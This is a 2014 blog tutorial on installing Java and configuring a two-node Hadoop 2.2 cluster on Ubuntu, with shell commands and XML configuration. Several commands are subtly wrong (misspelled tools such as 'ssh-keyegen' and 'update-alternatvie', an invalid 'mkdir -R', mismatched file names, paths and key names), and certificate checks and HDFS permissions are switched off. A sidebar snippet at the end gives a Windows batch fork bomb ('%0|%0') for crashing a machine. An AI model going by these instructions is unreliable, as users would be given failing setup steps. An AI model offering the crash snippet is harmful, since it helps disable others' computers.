Wednesday, April 2, 2014

Hadoop 2.2 Multi Node Cluster Setup

 

In this tutorial  you will learn how to setup Hadoop Multi Node cluster



If  you are using putty to access your Linux box remotely, please install openssh  by running this command, this also helps in configuring SSH access easily in the later part of the installation:
sudo apt-get install openssh-server


Prerequisites:

  1. Installing Java v1.7
  2. Adding dedicated Hadoop system user.
  3. Configuring SSH access.
  4. Disabling IPv6.

Before starting of installing any applications or softwares, please  makes sure your list of packages from all repositories and PPA’s is up to date or if not update them by using this command:
sudo apt-get update

Installing Java v1.7:

For running Hadoop it requires Java v1. 7+
Download Latest oracle Java Linux version of the oracle website by using this command
wget https://edelivery.oracle.com/otn-pub/java/jdk/7u45-b18/jdk-7u45-linux-x64.tar.gz
If it fails to download, please check with this given command which  helps to avoid passing username and password.
wget --no-cookies --no-check-certificate --header "Cookie: gpw_e24=http%3A%2F%2Fwww.oracle.com" "https://edelivery.oracle.com/otn-pub/java/jdk/7u45-b18/jdk-7u45-linux-x64.tar.gz"
Unpack the compressed Java binaries, in the directory:
sudo tar xvzf jdk-7u25-linux-x64.tar.gz
Create a Java directory using mkdir under /user/local/ and change the directory to /usr/local/Java by using this command
mkdir -R /usr/local/Java
cd /usr/local/Java
Copy the Oracle Java binaries into the /usr/local/Java directory.
sudo cp -r jdk-1.7.0_45 /usr/local/java
Edit the system PATH file /etc/profile and add the following system variables to your system path
sudo nano /etc/profile    or  sudo gedit /etc/profile
Scroll down to the end of the file using your arrow keys and add the following lines below to the end of your /etc/profile file:
JAVA_HOME=/usr/local/Java/jdk1.7.0_45
PATH=$PATH:$HOME/bin:$JAVA_HOME/bin
export JAVA_HOME
export PATH
Inform your Ubuntu Linux system where your Oracle Java JDK/JRE is located. This will tell the system that the new Oracle Java version is available for use.
sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/local/java/jdk1.7.0_45/bin/javac" 1
sudo update-alternatvie --set javac /usr/local/Java/jdk1.7.0_45/bin/javac
This command notifies the system that Oracle Java JDK is available for use
Reload your system wide PATH /etc/profile by typing the following command:
. /etc/profile
Test to see if Oracle Java was installed correctly on your system.
Java -version

Adding dedicated Hadoop system user.

We will use a dedicated Hadoop user account for running Hadoop. While that’s not required  but it is recommended, because it helps to separate the Hadoop installation from other software applications and user accounts running on the same machine.
a. Adding group:
sudo addgroup Hadoop
b. Creating a user and adding the user to a group:
sudo adduser –ingroup Hadoop hduser

Configuring SSH access:

The need for SSH Key based authentication is required so that the master node can then login to slave nodes (and the secondary node) to start/stop them and also local machine if you want to use Hadoop with it. For our single-node setup of Hadoop, we therefore need to configure SSH access to localhost for the hduser user we created in the previous section.
Before this step you have to make sure that SSH is up and running on your machine and configured it to allow SSH public key authentication.
Generating an SSH key for the hduser user.
a. Login as hduser with sudo
b. Run this Key generation command:
ssh-keyegen -t rsa -P ""
It will ask to provide the file name in which to save the key, just press has entered so that it will generate the key at ‘/home/hduser/ .ssh’
Enable SSH access to your local machine with this newly created key.
cat $HOME/.ssh/id_rsa.pub >> $HOME/.ssh/authorized_keys
The final step is to test the SSH setup by connecting to your local machine with the hduser user.
ssh hduser@localhost
This will add localhost permanently to the list of known hosts

Disabling IPv6.

We need to disable IPv6 because Ubuntu is using 0.0.0.0 IP for different Hadoop configurations. You will need to run the following commands using a root account:
sudo gedit /etc/sysctl.conf
Add the following lines to the end of the file and reboot the machine, to update the configurations correctly.
#disable ipv6
net.ipv6.conf.all.disable_ipv6 = 1
net.ipv6.conf.default.disable_ipv6 = 1
net.ipv6.conf.lo.disable_ipv6 = 1

 

Hadoop installation

Go to Apache Downloads and download Hadoop version 2.2.0 (prefer to download any stable versions)
Run this following command to download Hadoop version 2.2.0
wget http://apache.mirrors.pair.com/hadoop/common/stable2/hadoop-2.2..tar.gz
Unpack the compressed hadoop file by using this command:
tar –xvzf hadoop-2.2.0.tar.gz
Move hadoop package of your choice, I picked /opt/hadoop-2.2.0 for my convenience
sudo mv hadoop-2.2.0 /opt/hadoop-2.2.0
Make sure to change the owner of all the files to the hduser user and hadoop group by using this command:
sudo chown -R hduser:hadoop Hadoop
Add the follwing lines into .bashrc file
root@arrakis[~]#cd ~
root@arrakis[~]#vi .bashrc
copy and paste following line at end of the file
export HADOOP_HOME=/opt/hadoop-2.2.0
export HADOOP_MAPRED_HOME=$HADOOP_HOME
export HADOOP_COMMON_HOME=$HADOOP_HOME
export HADOOP_HDFS_HOME=$HADOOP_HOME
export YARN_HOME=$HADOOP_HOME
export HADOOP_CONF_DIR=$HADOOP_HOME/etc/hadoop
export YARN_CONF_DIR=$HADOOP_HOME/etc/hadoop
Modify hadoop environment file
Add JAVA_HOME to libexec/hadoop-config.sh at beginning of the file
root@arrakis[~]#vi /opt/hadoop-2.2.0/libexec/hadoop-config.sh
….
export JAVA_HOME='/usr/local/Java/jdk1.7.0_45'
….
Add JAVA_HOME to hadoop/hadoop-env.sh at beginning of the file
root@arrakis[~]#vi /opt/hadoop-2.2.0/etc/hadoop/hadoop-env.sh
….
export JAVA_HOME='/usr/local/Java/jdk1.7.0_45'
….
Check Hadoop installation
root@arrakis[~]#cd /opt/hadoop-2.2.0/bin
root@arrakis[bin]#./hadoop version
Hadoop 2.2.0
…..
At this point Hadoop installed in your node.
Create folder for tmp
root@arrakis[~]#mkdir -p $HADOOP_HOME/tmp

Configuration : Multi-node setup

Add IP address of Master and all Slaves to /etc/hosts – for both Master and all the slave nodes
Add the association between the hostnames and the IP address for the master and the slaves on all the nodes in the /etc/hosts. Make sure that the all the nodes in the cluster are able to ping to each other.
hduser@arrakis:/opt/hadoop-2.2.0/bin#vi /etc/hosts
10.184.39.67 master
10.184.36.134 slave
In our case we only have one slave, if you have more slaves name them as slave1, slave2…
Password-less ssh from master to slave
hduser@arrakis:[~]#ssh-keygen -t rsa -P ""
hduser@arrakis:[~]#ssh-copy-id -i /home/hduser/.ssh/id_dsa.pub hduser@slave
root@arrakis[bin]#ssh slave
[Note : If you skip this step, you will  have to provide passwords for all slaves when Master start the process ./start-*.sh . If you have configured multiple slaves repeat the process for every node ]
Add the Slave entries in $HADOOP_CONF_DIR/slaves -  only at Master node
Add all the slave entries in slaves file in Master node.
hduser@arrakis:[~]#vi /opt/hadoop-2.2.0/etc/hadoop/slaves
 slave
Note : again – we only have  one slave in this example, if you have more slaves add all the slave hostnames



Hadoop Configuration

both Master and all the slave

Add the properties in following hadoop configuration file which is availabile under $HADOOP_CONF_DIR
core-site.xml
hduser@arrakis[~]#cd /opt/hadoop-2.2.0/etc/hadoop
hduser@arrakis[hadoop]#vi core-site.xml
#Paste following between <configuration> tag
<property>
    <name>fs.default.name</name>
    <value>hdfs://master:9000</value>
  </property>
  <property>
    <name>hadoop.tmp.dir</name>
    <value>/opt/hadoop-2.2.0/tmp</value>
  </property>
hdfs-site.xml
hduser@arrakis[hadoop]#vi hdfs-site.xml
#Paste following between <configuration> tag
<property>
<name>dfs.replication</name>
<value>2</value>
 </property>
  <property>
<name>dfs.permissions</name>
<value>false</value>
</property>
Note : Our  replication values is 2 [one master and one slave ]. If you have more slaves put replication value based on that.
mapred-site.xml
hduser@arrakis[hadoop]#vi mapred-site.xml
#Paste following between <configuration> tag
 <property>
<name>mapreduce.framework.name</name>
<value>yarn</value>
</property>
yarn-site.xml
hduser@arakis[hadoop]#vi yarn-site.xml
#Paste following between <configuration> tag
<property>
    <name>yarn.nodemanager.aux-services</name>
    <value>mapreduce.shuffle</value>
  </property>
  <property>
    <name>yarn.nodemanager.aux- services.mapreduce.shuffle.class</name>
    <value>org.apache.hadoop.mapred.ShuffleHandler</value>
  </property>
  <property>
    <name>yarn.resourcemanager.resource- tracker.address</name>
    <value>master:8025</value>
  </property>
  <property>
    <name>yarn.resourcemanager.scheduler.address</name>
    <value>master:8030</value>
  </property>
  <property>
    <name>yarn.resourcemanager.address</name>
    <value>master:8040</value>
  </property>
Format the namenode – only at Master node
hduser@arrakis:/opt/hadoop-2.2.0/bin#cd /opt/hadoop-2.2.0/bin
hduser@arrakis:/opt/hadoop-2.2.0/bin# ./hadoop namenode -format


Administering Hadoop
 – Start & Stop
- Only at Master node

Start the process at Master node – slave nodes will automatically start
start-dfs.sh : to start namenode and datanode
hduser@arrakis:[~]# cd /opt/hadoop-2.2.0/sbin
hduser@arrakis:[sbin]# ./start-dfs.sh
check Master
hduser@arrakis:[sbin]#jps
 17675 Jps
 17578 SecondaryNameNode
 17409 NameNode
check Slave
hduser@slave:[sbin]#jps
 9317 Jps
 9250 DataNode
start-yarn.sh : to start resourcemanager and nodemanager
hduser@arrakis:[sbin]# ./start-yarn.sh
check Master
hduser@arrakis:[sbin]#jps
 17578 SecondaryNameNode
 17917 ResourceManager
 17409 NameNode
 18153 Jps
check Slave
hduser@slave:[sbin]#jps
 9317 Jps
 9250 DataNode
 9357 NodeManager

Working with Hadoop

execute command at master
hduser@arrakis:/opt/hadoop-2.2.0/bin# ./hdfs dfs -mkdir -p /user/hadoop2
hduser@arrakis:/opt/hadoop-2.2.0/bin# ./hdfs dfs -put /root/Desktop/test.html /user/hadoop2
hduser@arrakis:/opt/hadoop-2.2.0/bin# ./hdfs dfs -ls
Found 1 items
-rw-r--r-- 2 root supergroup 225 2013-11-11 20:19 /user/hadoop2/test.html
check slave node
hduser@slave:/opt/hadoop-2.2.0/bin# ./hdfs dfs -ls user/hadoop2/
Found 1 items
-rw-r--r-- 2 root supergroup 225 2013-11-11 20:19 /user/hadoop2/test.html
hduser@slave:/opt/hadoop-2.2.0/bin# /opt/hadoop-2.2.0/bin# ./hdfs dfs -cat /user/hadoop2/test.html
test file. Welcome to Hadoop2.2.0 Installation. !!!!!!!!!!!

No comments:

Post a Comment

how to make a batch file to crash windows

here is the "code" %0|%0 paste that in a notepad and save it as whateveryou want.bat for example lol.bat by running this it...